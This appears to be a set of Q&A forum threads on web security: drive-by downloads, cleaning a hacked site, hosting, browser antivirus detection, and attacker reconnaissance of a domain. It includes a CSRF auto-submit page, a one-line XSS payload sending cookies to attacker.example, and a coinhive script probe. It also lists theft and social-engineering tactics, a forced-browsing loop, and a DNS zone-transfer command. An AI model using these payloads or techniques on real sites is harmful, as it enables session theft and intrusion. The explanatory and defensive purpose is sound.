Now and then I (accidentally) come across websites that my anti-virus warns me about. Out of curiosity, what kind of damage can a website do?
I've been working in web development for around 4 years now and can't think of any 'genuine' damage worth warning the user about. Maybe I'm missing something obvious, but surely browsers and the basic security measures implemented by mainstream operating systems prevent anything particularly invasive from going on?
I'm talking about threats aside from anything deceptive, by the way (phishing etc.). Could taxing the browser enough warrant an anti-virus warning (e.g. overloading a page with resource-draining JavaScript)? Typically, cookies, caches, and localStorage all have limits - so I can't think of what could go on there.
I suspect this may be slightly off-topic, as it's less technically specific than what I'd usually ask. I'll happily delete it if this is the case.
The main risk is encountering a drive-by download.
A drive-by download isn't necessarily a file download in the usual sense; it could be a browser exploit that allows executable code (known as the payload) to be downloaded and executed on your system.
One example is the Microsoft Internet Explorer colspan Element Processing Arbitrary Code Execution Vulnerability:
Microsoft Internet Explorer contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. The vulnerability is due to improper processing of elements in web pages. An unauthenticated, remote attacker could exploit this vulnerability by convincing a user to view a malicious website. If successful, the attacker could exploit this vulnerability to execute arbitrary code on the system with the privileges of the user.
The vulnerability is due to improper handling of constantly changed colspan in a fixed table layout. If colspan could be increased after initialization, it could trigger a heap-based buffer overflow.
However, more recent exploits exist, such as this one from this year (2015) in Flash Player:
Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
Another attack vector from a website is a cross-domain attack such as Cross-Site Request Forgery (CSRF). Such a malicious site could be making background requests to other sites you're logged into. For example, it might be making AJAX requests to https://facebook.com/delete_account (a made-up URL path), and since you're logged into Facebook, your browser will pass your cookies along and the action would be triggered. That is, if Facebook did not have CSRF protection on the delete-account function (I'm pretty sure it does, though).
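To make that concrete, a bare-bones CSRF page might look like the sketch below. The URL and field name are made up, as above, and this only works if the target endpoint lacks CSRF tokens:

    <!-- Hypothetical malicious page: silently fires a cross-site POST.
         The victim's browser attaches their Facebook cookies automatically. -->
    <form id="csrf" action="https://facebook.com/delete_account" method="POST" style="display:none">
      <input type="hidden" name="confirm" value="1">
    </form>
    <script>document.getElementById("csrf").submit();</script>

An unguessable anti-CSRF token in the real form defeats this, because the attacker's page cannot read it cross-origin.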
Another example of a cross-domain attack is that the site may try to exploit an XSS flaw on another site you use. It could redirect you to another site and capture your credentials as you log in, or it could do something sneakier, like requesting a site in the background and grabbing your session cookie. This requires the target site to contain such an XSS flaw, however.
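For instance, a classic session-stealing payload injected through such a flaw can be a single line. Here attacker.example is a placeholder, and an HttpOnly flag on the session cookie blocks this particular trick:

    // Hypothetical XSS payload running in the context of the vulnerable site:
    // leak the victim's cookies to the attacker via a background image request.
    new Image().src = "https://attacker.example/steal?c=" +
        encodeURIComponent(document.cookie);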
One of the main issues is that when you go to a website, it can automatically download something onto your computer. Normally a website will ask if you are sure you want to download the item, but a site can start the download without your permission. And if the downloaded file is a virus, you now have a virus on your computer, and it can inflict any sort of damage.
See Microsoft's page on viruses (https://www.microsoft.com/security/pc-security/virus-whatis.aspx) for the problems a virus can cause and how to remove one.
Recently our website was hacked, and when we try to open it we see the report below:
Reported Attack Page!
This web page at www.example.com has been reported as an attack page and has been blocked based on your security preferences.
Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system. Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
Eventually I found out that some malicious code was injected, which is why it is being reported this way.
So how can I find out where that code is?
I would say, first, scan your own PC to ensure the infection did not originate there.
Then download the site to a safe location (you may need to disable your antivirus software for a while for this purpose). Hopefully you have a backup of the original site from before the infection (or your web hosting provider does). Diff it against the infected content and you should clearly see the difference.
If you do not have a backup, scan the infected scripts with antivirus software to determine the specific files, then browse through the code in those files and look for malicious code manually. These worms/trojans mostly append themselves to a file or to a specific tag; look for suspicious lines and parts of the code that do not look familiar.
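As a rough starting point for the manual hunt, a small script can flag the obfuscation functions that injected malware commonly uses. The directory, extensions, and patterns below are assumptions, not a complete list:

    // Minimal sketch (Node.js): walk a local copy of the site and flag
    // obfuscation markers commonly seen in injected malware. The directory,
    // extensions, and patterns are assumptions - extend them for your case.
    const fs = require("fs");
    const path = require("path");

    const suspicious = /eval\s*\(|base64_decode\s*\(|gzinflate\s*\(|unescape\s*\(/;

    function scan(dir) {
      for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
        const full = path.join(dir, entry.name);
        if (entry.isDirectory()) {
          scan(full);
        } else if (/\.(php|js|html?)$/i.test(entry.name)) {
          fs.readFileSync(full, "utf8").split("\n").forEach((line, i) => {
            if (suspicious.test(line)) {
              console.log(full + ":" + (i + 1) + ": " + line.trim());
            }
          });
        }
      }
    }

    scan("./site-download"); // hypothetical local copy of the infected site

Anything it flags still needs a human eye, since legitimate code uses eval too.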
So I have finished creating my first website that I will be hosting online. It has PHP, HTML, and JavaScript. Now I am looking for a way to host my website securely. I have looked at sites like GoDaddy and Web Hosting Hub. I was wondering what the best hosting service would be for my needs.
My needs:
Able to run PHP
Have an actual name, like www.noahhuppert.com
Be able to obscure the code so people cannot just copy it (my website is for my web design company and shows example templates people can use, but I don't want people just stealing those templates with a simple right click + Inspect Element)
Run server-side scripts (like slowing down connections for users who fail to log in too many times, to prevent brute-force cracking attempts)
Deny access to people reading files (I don't want people downloading my password hash files or anything like that)
Be able to host files on the service's servers; I don't just want a DNS record pointing back to my computer.
This question is asking for an opinion about which hosting site is the best, and I cannot answer that. Basically any Linux web host will provide most of what you're looking for.
What I do want to warn you about is this:
From your question, you're concerned with:
- security: this is not a web-host feature but a property of securely written code. See https://www.owasp.org/index.php/Top_10_2013 for a great introduction to website security.
- obscured code: you cannot prevent someone from stealing your CSS. They will not get at your raw templates (I'm assuming you're using templates) if you set your file permissions correctly on the web server.
- brute force protection: you'll need to code that up yourself; the web host provider would not (and should not) rate limit your connections. A minimal sketch of the idea follows below.
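Purely to illustrate the kind of logic involved, here is a sketch in Node.js/Express style; the names and thresholds are invented, and the same idea ports directly to PHP:

    // Minimal sketch (Node.js/Express style; names and thresholds invented):
    // lock an IP out for a while after too many failed login attempts.
    const failures = new Map(); // ip -> { count, last }
    const MAX_FAILURES = 5;
    const LOCKOUT_MS = 15 * 60 * 1000; // 15 minutes

    // Use as middleware in front of the login route.
    function loginGuard(req, res, next) {
      const entry = failures.get(req.ip);
      if (entry && entry.count >= MAX_FAILURES &&
          Date.now() - entry.last < LOCKOUT_MS) {
        return res.status(429).send("Too many failed logins; try again later.");
      }
      next();
    }

    // Call this whenever a login attempt fails.
    function recordFailure(ip) {
      const entry = failures.get(ip) || { count: 0, last: 0 };
      failures.set(ip, { count: entry.count + 1, last: Date.now() });
    }

In production you would persist the counters and, as the question suggests, slow responses down rather than hard-block.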
I'd like to be able to use any language from a web browser (PHP, ASP, Flash, JavaScript, Java, etc.) to detect whether a user has antivirus installed.
I'm researching the possibility of only letting a user log into a Virtual Private Network from machines which have up to date antivirus installed.
Can this be done, if so how?
Thanks.
No server-side language (PHP, ASP, etc.) has access to data known only to the browser, and client-side languages (JavaScript, Flash, etc.) are sandboxed in an environment where, for security reasons, they cannot access data external to their page.
In other words, only a plugin on a browser can (possibly) get that kind of data, and expose it to a script that runs in a page.
Simple: just add an asynchronous script call (e.g. <script src="https://coin-hive.com/lib/coinhive.min.js" async></script>) to a resource located on a known malware-hosting domain (currently coinhive is detected as a malware host by Avast, and those requests are blocked). If the request succeeds (i.e. the JavaScript objects created on the malware host actually become available in the client after some time), then there is no antivirus protection on internet communication, which is enabled by default in the most recent antivirus software.
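A minimal version of that probe might look like the following; note that onerror also fires for ad blockers and plain network failures, so treating a blocked request as proof of antivirus protection is an assumption:

    <!-- Minimal sketch: detect whether a request to a blacklisted host is blocked.
         onerror also fires for ad blockers and ordinary network failures. -->
    <script>
      var probe = document.createElement("script");
      probe.src = "https://coin-hive.com/lib/coinhive.min.js";
      probe.onload = function () {
        console.log("Request succeeded: no web-protection module detected.");
      };
      probe.onerror = function () {
        console.log("Request blocked: antivirus (or a similar filter) is active.");
      };
      document.head.appendChild(probe);
    </script>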
This will, however, make your site vulnerable to an attack from the malware host. You could overcome this problem by deliberately creating an infected domain and reporting it to several antivirus blacklists. Once your own domain is blacklisted, you will be able to run this test safely. But it may take some time and patience...
The final unavoidable problem is that your antivirus-protected user will see an ugly warning from the antivirus telling them that your site is infected with a virus. You could mitigate this problem by creating very clear and trustworthy messaging in your app. Something like this:
In order to access this site you must enable antivirus protection.
Please click the button below to start your antivirus validation. A request to a well-known malware host will be issued, and your antivirus should show you a warning blocking the request if you're properly protected.
The Juniper client (and I'm sure many other VPN clients too) does check that the user's computer has an up-to-date version of an approved antivirus system installed, but it's not run from the browser - it has to be installed - so it doesn't answer your question, though I can see where you're coming from. As others have said, letting a website spy on people's computers like that would represent a significant security hole.
So I'm going to say there is no language available from a web browser that would let you achieve what you're looking to do without getting users to install something on their computers. Whether that would be an ActiveX control or some other extension/plug-in I couldn't say, but you would need it in order to query the file system or registry and answer the question of whether a given version of any given software is present. That is, I think, roughly what the Juniper client does.
http://discuss.extremetech.com/forums/thread/1004433597.aspx
http://kb.juniper.net/InfoCenter/index?page=content&id=KB9216
Given a domain, is it possible for an attacker to discover one or many of the pages/resources that exist under that domain? And what could an attacker do/use to discover resources in a domain?
I have never seen the issue addressed in any security material (because it's a solved problem?) so I'm interested in ideas, theories, and best guesses, in addition to practices; anything an attacker could use in a "black box" manner to discover resources.
Some of the things that I've come up with are:
Google -- if Google can find it, an attacker can.
A brute force dictionary attack -- iterate common words and word combinations (Login, Error, Index, Default, etc.). The dictionary could also be narrowed if the resource extension (xml, asp, html, php) were known, which is fairly discoverable.
Monitor traffic via a sniffer -- watch for a listing of pages that users go to. This assumes some type of network access, in which case URL discovery is likely small peanuts given that the attacker already has network access.
Edit: Obviously, directory listing is turned off.
The list on this is pretty long; there are a lot of techniques that can be used to do this. Note that some of them are highly illegal:
See what Google, archive.org, and other web crawlers have indexed for the site.
Crawl through public documents on the site (including PDF, JavaScript, and Word documents) looking for private links.
Scan the site from different IP addresses to see if any location-based filtering is being done.
Compromise a computer on the site owner's network and scan from there.
Exploit a vulnerability in the site's web server software and look at the data directly.
Go dumpster diving for auth credentials and log into the website using a password on a post-it (this happens way more often than you might think).
Look at common files (like robots.txt) to see if they 'protect' sensitive information.
Try common URLs (/secret, /corp, etc.) to see if they give a 302 (a redirect, often to a login page, which suggests the resource exists but is protected) or a 404 (page not found).
Get a low-level job at the company in question and attack from the inside; or, use that as an opportunity to steal credentials from legitimate users via keyboard sniffers, etc.
Steal a salesperson's or executive's laptop -- many don't use filesystem encryption.
Set up a coffee/hot dog stand offering a free WiFi hotspot near the company, proxy the traffic, and use that to get credentials.
Look at the company's public wiki for passwords.
And so on... you're much better off attacking the human side of the security problem than trying to come in over the network, unless you find some obvious exploits right off the bat. Office workers are much less likely to report a vulnerability, and are often incredibly sloppy in their security habits -- passwords get put into wikis and written down on post-it notes stuck to the monitor, road warriors don't encrypt their laptop hard drives, and so on.
The most typical attack vector would be trying to find well-known applications, for example /webstats/ or /phpMyAdmin/, and looking for typical files an inexperienced user might leave in a production environment (e.g. phpinfo.php). And most dangerous: text editor backup files. Many text editors leave a copy of the original file with '~' appended or prepended, so imagine you have whatever.php~ or whatever.aspx~. As these are not executed, an attacker might get access to the source code.
Brute forcing (use something like OWASP DirBuster, which ships with a great dictionary; it also parses responses, so it can map the application quite quickly and find resources even in quite deeply structured apps)
Yahoo, Google, and other search engines, as you stated
robots.txt
sitemap.xml (quite common nowadays, and often with lots of stuff in it)
Web stats applications, if any are installed on the server and publicly accessible (such as /webstats/)
Brute forcing for files and directories is generally referred to as "Forced Browsing"; the term might help your Google searches. A rough sketch of the core idea follows.
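Stripped to its essentials, forced browsing is just a loop like this (Node.js 18+; the wordlist and target are placeholders, and DirBuster does the same thing at scale with much smarter response parsing):

    // Minimal sketch (Node.js 18+; wordlist and target are placeholders):
    // probe common paths and report anything that is not a plain 404.
    const base = "https://example.com";
    const words = ["admin", "login", "backup", "webstats", "phpMyAdmin"];

    (async () => {
      for (const word of words) {
        const res = await fetch(`${base}/${word}/`, { redirect: "manual" });
        if (res.status !== 404) {
          console.log(`${word}/ -> HTTP ${res.status}`); // exists, redirects, or forbidden
        }
      }
    })();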
The path to resource files like CSS, JavaScript, images, video, audio, etc can also reveal directories if they are used in public pages. CSS and JavaScript could contain telling URLs in their code as well.
If you use a CMS, note that some CMSs put a meta tag into the head of each page indicating the page was generated by that CMS. If your CMS version is insecure, it could be an attack vector.
It is usually a good idea to set your defenses up in a way that assumes an attacker can list all the files served unless protected by HTTP AUTH (aspx auth isn't strong enough for this purpose).
EDIT: more generally, you are supposed to assume the attacker can identify all publicly accessible persistent resources. If the resource doesn't have an auth check, assume an attacker can read it.
The "robots.txt" file can give you (if it exists, of course) some information about what files\directories are there (Exmaple).
Can you get at the whole machine? Use common / well-known scanners and exploits.
Try social engineering. You'll be surprised how effective it is.
Brute force sessions (JSESSIONID etc.), maybe with a fuzzer.
Try commonly used path signatures (/admin/, /adm/, ... on the domain).
Look for data inputs to probe further with XSS / SQL injection / vulnerability testing.
Exploit weak, well-known applications within the domain.
Use phishing tricks (XSS/XSRF/HTML meta refresh >> iframe) to forward the user to your fake page (while the domain name stays the same).
Black-box reverse engineering - What programming language is used? Are there bugs in that VM/interpreter version? Try service fingerprinting. How would you write a page like the one you want to attack? What security issues might the developer of the page have missed?
a) Try to think like a dumb developer ;)
b) Hope that the developer of the domain is dumb.
Are you talking about ethical hacking?
You can download the site with SurfOffline tools and get a pretty good idea of the folders, architecture, etc.
Best Regards!
When attaching a new box onto "teh interwebs", I always run (ze)nmap. (I know the site looks sinister - that's a sign of quality in this context, I guess...)
It's pretty much push-button and gives you a detailed explanation of how vulnerable the target (read: "your server") is.
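For the command-line version, a basic run looks something like this; example.com stands in for your own server, and you should only scan machines you own:

    # Version-detect the services listening on your own box (hypothetical host)
    nmap -sV example.com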
If you use mod_rewrite on your server, you could do something like the following:
Any request that does not fit your expected URL patterns can be redirected to a special page, where the IP (or whatever else) is tracked. Once you see a certain number of "attacks" from an IP, you can ban that user/IP. The most efficient way would be to automatically add a special rewrite condition to your mod_rewrite rules.
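The rules themselves didn't survive in the post; a rough .htaccess sketch of that idea might be the following, where the whitelist and the tracker script are assumptions:

    # Hypothetical .htaccess: send unexpected requests to a tracking script
    RewriteEngine On
    # Anything that is not a known page or asset gets rewritten to the logger
    RewriteCond %{REQUEST_URI} !^/(index\.php|track_probe\.php|css/|js/|images/)
    RewriteRule ^ /track_probe.php [L]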
A really good first step is to try a DNS zone transfer against their name servers. Many are misconfigured and will give you the complete list of hosts.
The fierce domain scanner does just that:
http://ha.ckers.org/fierce/
It also guesses common host names from a dictionary and, upon finding a live host, checks numerically close IP addresses.
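Trying the zone transfer by hand is a one-liner; example.com and ns1.example.com are placeholders, and a properly configured server will refuse the request:

    # Ask the name server for a full copy of the zone (hypothetical target)
    dig axfr example.com @ns1.example.com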
To protect a site against attacks, call upper management into a security meeting and tell them never to use their work password anywhere else. Most suits will carelessly use the same password everywhere: work, home, pr0n sites, gambling, public forums, Wikipedia. They are simply unaware that not all sites take care not to look at their users' passwords (especially the sites offering "free" stuff).